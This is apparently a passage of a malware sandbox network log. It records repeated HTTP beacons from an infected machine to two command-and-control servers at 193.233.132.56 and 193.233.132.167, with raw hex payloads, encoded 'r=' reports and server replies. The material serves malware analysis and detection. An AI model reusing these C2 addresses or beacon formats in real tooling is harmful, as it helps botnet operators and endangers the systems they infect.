                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.386396885 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.637376070 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1478192.168.2.551334193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.492233992 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.735397100 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1479192.168.2.551335193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.962289095 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.208838940 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1480192.168.2.551336193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:45.989609957 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.239198923 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1481192.168.2.551337193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.461107969 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.711839914 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1482192.168.2.551338193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.573121071 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:46.820507050 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1483192.168.2.551339193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.042798996 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.292421103 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1484192.168.2.551340193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.074836969 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.329559088 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1485192.168.2.551341193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.541368961 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.789307117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1486192.168.2.551342193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.664446115 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:47.911456108 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1487192.168.2.551343193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.118308067 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.366550922 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1488192.168.2.551344193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.159632921 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.407752991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1489192.168.2.551345193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.618432999 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.868678093 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1490192.168.2.551346193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.742523909 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:48.988013029 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1491192.168.2.551347193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.197108030 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.444839001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1492192.168.2.551348193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.237808943 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.487272024 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1493192.168.2.551349193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.695616007 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.947695971 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1494192.168.2.551350193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
